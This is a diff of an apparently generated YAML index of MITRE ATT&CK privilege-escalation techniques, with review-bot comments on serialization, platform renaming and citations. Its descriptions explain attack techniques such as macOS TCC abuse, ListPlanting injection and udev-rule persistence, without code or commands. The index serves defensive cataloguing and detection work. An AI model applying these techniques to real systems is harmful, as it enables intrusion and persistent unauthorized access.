- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -27911,9 +28192,10 @@ privilege-escalation:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
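Review bot: splitting `- Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` into `- Nilesh Dherange (Gurucul)` and `- Naveen Vijayaraghavan` drops the Gurucul affiliation from the second contributor. If that is how the upstream bundle now lists them this is fine to carry through, but it is worth confirming it is not a generator-side split on the comma.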
@@ -27930,9 +28212,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
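Review bot: replacing `- Office 365` and `- Google Workspace` with `- Office Suite` (and, in the T1484 and T1078.004 hunks below, `- Azure AD` with `- Identity Provider`) changes the platform names the per-platform index CSVs are keyed on. Confirm the index generator maps the new platform names to the existing platform-specific index files, otherwise techniques that were listed under the Google Workspace and Office 365 indexes silently disappear from them on regeneration.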
@@ -27978,38 +28259,19 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
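Review bot: the new `description: |+` block uses the keep chomping indicator, and together with the trailing empty `+` line it preserves trailing newlines in the value; other descriptions in this file are emitted as `description: |-` (T1134 above, T1546.017 below) or as double-quoted scalars ending in `\n`. Unless the upstream text really ends in a blank line that must survive, normalise this to `|-` in the generator so the serialisation style does not depend on incidental trailing whitespace in the source.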
@@ -28017,6 +28279,8 @@ privilege-escalation:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -28024,7 +28288,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -28054,7 +28318,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -28100,7 +28363,7 @@ privilege-escalation:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -28145,8 +28408,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1037.001:
technique:
@@ -28172,7 +28433,7 @@ privilege-escalation:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -28198,59 +28459,28 @@ privilege-escalation:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
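Review bot: this hunk removes `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the whole `external_references` list from the top of the T1055.015 object, so on its own it would leave the object without an identifier or citations; that only works if the same fields are re-emitted further down the object, which the reviewer has to verify hunk by hunk. The actual content change here is small (a new `(Citation: Hexacorn Listplanting)` in the description, the `modified` bump), so a generator with stable key ordering would have produced a readable diff.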
@@ -28267,6 +28497,9 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -28281,21 +28514,52 @@ privilege-escalation:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
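Review bot: the fields removed at the top of T1055.015 come back here with `revoked: false`, the new `Hexacorn Listplanting` reference and `x_mitre_attack_spec_version: 3.2.0`, but note the reference entries now order `description` before `url` whereas the removed entries ordered `url` first. That means the upstream bundle's key order leaks straight into the index, which will keep producing whole-object rewrites on every regeneration; sort keys (or fix a canonical order) in the serializer so future diffs show only the substantive changes.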
@@ -28340,9 +28604,8 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
@@ -28399,8 +28662,8 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -28409,7 +28672,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.008:
technique:
@@ -28451,7 +28713,7 @@ privilege-escalation:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -28476,12 +28738,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -28521,8 +28782,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -28530,13 +28793,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -28567,17 +28830,14 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
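Review bot: the added sentence about `Win32_ScheduledJob` introduces `(Citation: Malicious Life by Cybereason)`, which must be matched by a reference entry of that exact `source_name` in this object's `external_references`; check the reference hunk for this technique before merging. While this description is being touched, note the unchanged context lines still carry hard line breaks inside the `|-` block (`added to the at.allow` / `file.`, `the at.deny` / `file is checked`), which a literal block scalar keeps as newlines in the rendered text; they look like stripped inline-code tags and should be fixed at the generator rather than carried forward.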
@@ -28640,7 +28900,7 @@ privilege-escalation:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -28674,8 +28934,8 @@ privilege-escalation:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -28684,6 +28944,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
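Review bot: the new reference URL `https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe` carries a `#blog-subscribe` fragment that points at the page's subscribe widget rather than the article; drop the fragment if the upstream bundle allows, or at least do not let it propagate into the rendered index. The `(n.d.)` date is also worth a second look given the article is identified well enough to carry a retrieval date of June 19, 2024.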
@@ -28696,7 +28960,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests:
- name: At - Schedule a job
@@ -28844,9 +29107,67 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1546.007:
technique:
x_mitre_platforms:
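Review bot: in the new T1546.017 object the `x_mitre_detection` string is inconsistently formatted: two paths are in backticks while `/usr/lib/udev/rules.d/` is not, the value ends with a trailing space before the closing quote (`2024) '`), and the detection names only three of the five rule directories listed in the description (`/run/udev/rules.d/` and `/usr/local/lib/udev/rules.d/` are missing, which matters because the description says a rule's priority depends on which directory it sits in). This is upstream text, but since the index is regenerated from it, either normalise it in the generator or file the fix upstream so detection guidance covers every directory the technique can use.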
@@ -28882,7 +29203,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -28906,12 +29227,11 @@ privilege-escalation:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -28995,11 +29315,10 @@ privilege-escalation:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -29051,9 +29370,8 @@ privilege-escalation:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests:
- name: Create local account (Linux)
@@ -29216,7 +29534,7 @@ privilege-escalation:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
